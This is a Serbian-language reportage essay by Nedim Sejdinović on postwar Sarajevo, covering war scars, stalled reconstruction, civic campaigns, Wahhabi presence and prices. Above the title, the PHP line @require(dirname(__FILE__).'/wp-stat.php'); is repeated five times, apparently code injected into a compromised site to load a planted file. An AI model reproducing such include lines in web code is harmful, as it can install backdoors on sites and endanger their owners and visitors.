@require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); SARAJEVO DANAS: Tragovi rata koji podsećaju na beskonačnost ljudske gluposti – Nedim Sejdinović

SARAJEVO DANAS: Tragovi rata koji podsećaju na beskonačnost ljudske gluposti

Ove se godine navršava decenija od potpisivanja Dejtonskog sporazuma, koji je Bosni i Hercegovini i njenom glavnom gradu, porušenom, iscrpljenom i obeščašćenom, doneo mir. Skoro deset godina je prošlo, a i danas u Sarajevu na svakom koraku prepoznajete tragove rata, tragove troipogodišnjeg granatiranja, troipogodišnje kampanje straha. Ko je imao prilike da u Sarajevo češće dolazi posle završetka rata, može proteklu deceniju da podeli na dva dela: koliko god da je bilo začuđujuće kako se u prvim posleratnim godinama grad brzo diže takoreći iz pepela, toliko je začuđujuće to što u poslednjih pet godina rekonstrukcija takoreći stoji. Neke ulice u centru podsećaju na ulice evropskih metropola, ali dovoljan je samo jedan pogled “iza”, pa da se vide zidovi prepuni ožiljaka od gelera ili, neretko, porušene građevine.

Ako je tačno da gradovi po definiciji ne miruju, da mogu samo da rastu ili da se urušavaju u sebe, onda Sarajevo nažalost pripada ovoj drugoj skupini. Pokazatelji za to jesu veoma spora rekonstrukcija i skoro potpuni nedostatak novogradnje, kao i prilično niska cena kvadratnog metra stambenog prostora, najmanje dvostruko niža nego recimo u Novom Sadu. Niskoj ceni nije doprinela samo uspešno izvršena “deložacija” (oslobađanje bespravno useljenih stanova) i činjenica da stanove prodaju građani srpske nacionalnosti koji su se u međuvremenu aklimatizovali u drugim sredinama, već i dalje veoma velik odliv ljudi iz Sarajeva (i to ne samo mladih) koji potražuju sreću na nekim drugim svetskim meridijanima. Sa druge strane, oni koji su tokom rata uspeli da pobegnu iz grada, veoma retko se vraćaju. Jedan od proizvoda rata je i multiplikacija Sarajeva u skoro svim delovima sveta.

Proizvod rata je i pokleknuće Sarajeva u medijskom, kulturnom i umetničkom smislu. Uspesi koji su pojedini sarajevski kulturno-umetnički projekti ostvarili u inostranstvu pre su proizvod ogromnog entuzijuazma pojedinaca nego dobrog sistema. Sarajevo je tokom sedamdesetih, posebno osamdesetih, uspelo ne samo da sustigne, nego i u nekim stvarima i prestigne do tada neprikosnovene kulturne centre – Beograd i Zagreb, ali su sada stvari vraćene na početne pozicije. U izlozima i kod uličnih prodavaca dominiraju knjige i prevodi koji pristižu iz ova dva grada – Zagreb naravno ima prednost. Tek poslednjih godina državni organi BiH su shvatili da je veoma važno ulagati u kulturu, a pravi rezultati tog preokreta tek se očekuju. Još jednom se pokazuje da je kultura poput engleskog vrta: za njegovo stvaranje potrebne su decenije, a može da se uništi za nekoliko trenutaka.

GRAĐANSKE BITKE

Sa druge strane, u Sarajevu i celoj Bosni mnogo su primetnije aktivnosti – i rezultati tih aktivnosti – tzv. civilnog društva nego na našim prostorima. Čini se da je građanska svest na višem nivou, odnosno da su građani svesniji da se za neke stvari moraju sami izboriti. Osim toga, u BiH nije vođena decenijska kampanja protiv udruživanja građana u NVO.

U februaru prošle godine jedna civilna inicijativa urodila je plodom – građani su bili jači od političara – sprečeno je da glavna sarajevska ulica promeni ime, iz Maršala Tita u Alije Izetbegovića. Organizovana je suptilna i uspešna kampanja pod motom “Sretan je ovaj grad ako sam ja jedini problem”, motom koji se nalazio na stotinama slika Josipa Broza u raznim formatima i oblicima. Krajnji rezultat kampanje je činjenica da sada nikom u Sarajevu ne pada ni na pamet da menja ime Titovoj. Izetbegovićevi poštovaoci moraće da se zadovolje manjom ulicom…

Ovih su dana nevladine organizacije ponovo na nogama. Priča je opet vezana za Titovo ime, odnosno za kompleks zgrada bivše, džinovske kasarne “Maršal Tito” koji se nalazi takoreći u centru grada. Dugo vremena je u opticaju bila ideja da se ex-kasarna pretvori u univerzitetski kampus, a krenulo se čak i u delimičnu realizaciju te ideje. Nekoliko fakulteta je tu smešteno, kao i čitav niz omladinskih i inih nevladinih organizacija. (Inače, tema gradskih kasarni će tek postati aktuelna kod nas, a nadati je se da će posle izmeštanja vojske ti prostori biti valjano iskorišćeni za dobrobit svih građana!) Međutim, nedavno se pojavila vest da će jedan dobar deo kompleksa biti prodat američkoj ambasadi, što je bio povod za veliki protest sarajevskih nevladinih organizacija, koji žele da se bivši militarizovani prostor pretvori u centar nauke, društvenog napretka, urbanosti i mira.

NIGDE FEREDŽE, ALI TU SU VEHABIJE

Pojedinci sa ovih prostora često su skloni da današnje Sarajevo predstave kao grad nad kojim islam potpuno dominira, te da je to primetno na svakom koraku. Sigurno ste već čuli priču o sarajevskim ženama sa feredžom, u odnosu na koje su normalno obučene prava retkost. To, naravno, nema veze sa stvarnošću, a vaš reporter tokom svojih temeljitih obilazaka sarajevskih ulica nije sreo nijednu zabrađenu pripadnicu lepšeg pola. U tom smislu, Sarajevo se ni po čemu ne razlikuje od Sarajeva iz polovine osamdesetih recimo. Međutim, postoji drugi problem koji nije vidljiv na prvi pogled, a koji je nama itekako blizak.

Primetno je mešanje Islamske verske zajednice u svakodnevni javni i politički život. Osim toga, u Bosni su prisutni, i to ne baš u malom broju, pripadnici vehabizma, interpretativnog toka islama koji se zalaže za bukvalno usvajanje određenih verskih pravila, odnosno povratak korenima, odnosno fundamentalizam. Zvaničnici Islamske verske zajednice oštro se protive delovanju tzv. vehabija, koji se inače finansiraju iz Saudijske Arabije. U Sarajevu vehabije drže nekolike prodavnice mešovite robe u kojima se ne prodaju alkohol i cigarete, ali i “fastfudove”. Što se religije tiče, situacija je, dakle, slična kao kod nas, jedino što kod nas ziloti (pravoslavni fundamentalisti) ne drže pljeskavičarnice. Ili mi bar za to ne znamo.

PDV GROZNICA

I u Sarajevu ljubitelji kupovine i mega-diskonta imaju priliku da uživaju u beskrajnim šarenim rafovima, sa neverovatnom mogućnošću izbora. Tu je naravno “Merkator”, ali posebnu pažnju skrećemo na diskont “VF” na Pofalićima, u okviru kojeg se nalazi veliki ekspres restoran sa izuzetnom ponudom jela, uz baš pristupačne cene. Uopšte, hrana je u Sarajevu, nekim čudom, znatno jefitnija nego u Srbiji hraniteljici i ravnoj Vojvodini. Sa druge strane, u BiH su alkoholna pića i cigarete neuporedivo skuplji.

Unutrašnjost “VF-a” zaista podseća na prodavnice bivše SFRJ, jer su prisutni ne samo pojedinačni proizvodi nego kompletni asortimani iz svih bivših jugo-republika. Interesantno je recimo da su i prehrambeni proizvodi koji pristižu iz Srbije ovde i do 30 posto jeftiniji nego u matičnoj im zemlji. Kakva ekonomska logika je u pitanju, to ne znamo. A što se ekonomije pak tiče, Bosnu ovih meseci potresa PDV groznica – novine su prepune spekulacija šta će PDV doneti, a šta odneti. To vas verovatno na nešto podseća…

TRAGOVI RATA, OPET

Za kraj, vratimo se tragovima rata. U pomenutom delu Sarajeva, Pofalićima, ne postoji niti jedna zgrada bez tih tragova. Neki soliteri su tek beživotne prazne kulise, neki su delimično naseljeni a delimično izgoreli. Ostale zgrade su manje ili više uspešno zakrpljene. Na mnogim terasama – rupe od snajperskih hitaca (pogledaj fotografiju!). Svi ti tragovi koji bi da nas podsete na bezgraničnost ljudskog zla i beskonačnost ljudske gluposti!

Da li će Sarajevo ponovo biti “gdje je nekad bilo”, ne zavisi samo od Sarajlija i države BiH. Koliko god to Sarajlije htele priznati ili ne, njihovu sudbinu još uvek, na skoro morbidan način, određuju elite i građani susednih država, tačnije moć onih nacionalističkih snaga koje još uvek veruju da je moguće BiH i Sarajevo kao gumicom izbrisati sa geografskih i političkih karata.

Nedim Sejdinović

 

Sviđa vam se ovaj tekst? Odojite sekund vašeg vremena da podržite Nedima Sejdinovića preko Patreon-a!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.